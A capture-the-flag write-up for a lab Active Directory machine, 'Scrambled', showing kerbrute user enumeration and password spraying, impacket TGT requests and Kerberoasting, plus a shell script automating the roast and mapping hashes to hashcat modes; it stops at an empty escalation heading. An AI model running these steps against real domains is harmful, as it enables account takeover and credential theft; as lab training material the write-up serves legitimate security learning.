Scrambled

Medium Machine, Mar 13, 2026
#nmap #kerberos #kerbrute #getTGT #impacket #GetUserSPNs


Domain: scrm.local

nmap

80 HTTP

[screenshot of the site]

[screenshot of a notice on the site] Maybe we can find a user who hasn't reset their password yet.

Username from the screenshot: ksimpson

Internal app [screenshot]

88 Kerberos

kerbrute

Finding usernames

./kerbrute_linux_amd64 userenum --dc dc1.scrm.local -d scrm.local /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt

   __             __               __        
  / /_____  _____/ /_  _______  __/ /____    
 / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \  
/ ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/  
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                           
  
Version: dev (9cfb81e) - 08/25/22 - Ronnie Flathers @ropnop  
  
2022/08/25 06:27:47 >  Using KDC(s):  
2022/08/25 06:27:47 >   dc1.scrm.local:88  
  
2022/08/25 06:27:57 >  [+] VALID USERNAME:       administrator@scrm.local  
2022/08/25 06:28:25 >  [+] VALID USERNAME:       asmith@scrm.local  
2022/08/25 06:29:04 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/08/25 06:29:34 >  [+] VALID USERNAME:       jhall@scrm.local
2022/08/25 06:33:17 >  [+] VALID USERNAME:       sjenkins@scrm.local  
2022/08/25 06:33:46 >  [+] VALID USERNAME:       khicks@scrm.local  
2022/08/25 06:38:19 >  [+] VALID USERNAME:       Asmith@scrm.local

The enumeration itself didn't get me anywhere directly, but it gave me a list of valid users to work with, together with the ksimpson name from the website. Note the duplicates (administrator/Administrator, asmith/Asmith): Kerberos principal lookups are case-insensitive, so a wordlist with case variants reports the same account more than once.

The site hinted that reset passwords are just the username, so let's spray the user list. kerbrute's passwordspray takes one password per run, so I tried ksimpson against the list (one guess per account stays well under any lockout threshold) and got a valid match for ksimpson:ksimpson.

./kerbrute_linux_amd64  passwordspray -d scrm.local --dc dc1.scrm.local ../../../scrambled/users.txt ksimpson
   __             __               __        
  / /_____  _____/ /_  _______  __/ /____    
 / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \  
/ ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/  
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                           
  
Version: dev (9cfb81e) - 08/25/22 - Ronnie Flathers @ropnop  
  
2022/08/25 06:44:56 >  Using KDC(s):  
2022/08/25 06:44:56 >   dc1.scrm.local:88  
  
2022/08/25 06:44:56 >  [+] VALID LOGIN:  ksimpson@scrm.local:ksimpson  
2022/08/25 06:44:56 >  Done! Tested 8 logins (1 successes) in 0.292 seconds

135 RPC

139/445 NetBIOS/SMB

389 LDAP (domain: scrm.local)

464 kpasswd

593 RPC over HTTP

636 LDAPS


Foothold

getTGT impacket

We have a working username:password pair, ksimpson:ksimpson, so let's get a TGT for it.

┌[blackBox]─[06:48-25/08]─[/home/parsec/htb/tools/kerbrute/dist]  
└╼parsec$getTGT.py scrm.local/ksimpson:ksimpson -dc-ip scrm.local  
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation  
  
[*] Saving ticket in ksimpson.ccache

Let's export that so the impacket tools can use it:

export KRB5CCNAME=ksimpson.ccache

Now we should be able to authenticate with this TGT instead of a password. Let's look for service accounts with SPNs and request their service tickets (Kerberoasting).

GetUserSPNs impacket

GetUserSPNs.py -request scrm.local/ksimpson -k -no-pass -dc-ip dc1.scrm.local
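The ticket-based Kerberoast step above, with the checks that usually bite on this kind of box, as an added example rather than code from the original writeup. It assumes impacket's getTGT.py and GetUserSPNs.py are on PATH and that dc1.scrm.local resolves (an /etc/hosts entry). The hash line used for the offline checks is a constructed placeholder with dummy hex, not a real ticket, and the service account name in it is invented.

```shell
#!/bin/sh
# Added example (not from the writeup): TGT -> KRB5CCNAME -> GetUserSPNs -k -no-pass,
# plus helpers that map the resulting $krb5tgs$ lines to a hashcat mode and an account.
# Assumes impacket scripts on PATH and the scrm.local names from the writeup.

DOMAIN="${DOMAIN:-scrm.local}"
DC="${DC:-dc1.scrm.local}"
ACCOUNT="${ACCOUNT:-ksimpson}"
PASSWORD="${PASSWORD:-ksimpson}"

# Constructed sample line in GetUserSPNs -request format (dummy hex, invented account).
SAMPLE_ROAST='$krb5tgs$23$*svc_example$SCRM.LOCAL$scrm.local/svc_example*$00112233445566778899aabbccddeeff$0011223344556677'

# ccache_env NAME: print KRB5CCNAME=<absolute path>. A relative KRB5CCNAME, as in the
# writeup, only works from the directory getTGT.py wrote the ccache into.
ccache_env() {
  case "$1" in
    /*) printf 'KRB5CCNAME=%s\n' "$1" ;;
    *)  printf 'KRB5CCNAME=%s/%s\n' "$(pwd)" "$1" ;;
  esac
}

# hashcat_mode HASHLINE: etype in the $krb5tgs$<etype>$ prefix -> hashcat mode.
# RC4 (23) cracks far faster than AES (17/18); impacket asks for RC4 where the account
# still allows it, so most roasted lines will be 23.
hashcat_mode() {
  case "$1" in
    '$krb5tgs$23$'*) echo 13100 ;;
    '$krb5tgs$17$'*) echo 19600 ;;
    '$krb5tgs$18$'*) echo 19700 ;;
    *) echo "unrecognised hash line" >&2; return 1 ;;
  esac
}

# spn_user HASHLINE: the service account name, so a cracked hash maps back to an account.
# etype 23: $krb5tgs$23$*user$REALM$spn*$...   etype 17/18: $krb5tgs$17$user$REALM$*spn*$...
spn_user() {
  printf '%s\n' "$1" | sed 's/^\$krb5tgs\$[0-9]*\$\*\{0,1\}//; s/\$.*//'
}

# roast: full ticket-based flow. Needs a live KDC, so it is not run automatically.
# If GetUserSPNs fails with KRB_AP_ERR_SKEW, sync your clock to the DC first.
roast() {
  getTGT.py "$DOMAIN/$ACCOUNT:$PASSWORD" -dc-ip "$DC"      # writes $ACCOUNT.ccache in cwd
  export "$(ccache_env "$ACCOUNT.ccache")"
  # -k -no-pass: authenticate with the ccache. Pass the DC hostname (as the writeup
  # does), since Kerberos auth to LDAP needs a name that has an SPN, not an IP.
  GetUserSPNs.py "$DOMAIN/$ACCOUNT" -k -no-pass -dc-ip "$DC" -request -outputfile roast.txt
  while read -r line; do
    printf '%s -> hashcat -m %s roast.txt wordlist\n' "$(spn_user "$line")" "$(hashcat_mode "$line")"
  done < roast.txt
}

# Usage: roast
```

The helpers are what you run on roast.txt afterwards: every line GetUserSPNs writes gets its mode and account printed, so you crack RC4 lines first and know which service account a recovered password belongs to.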


Root Escalation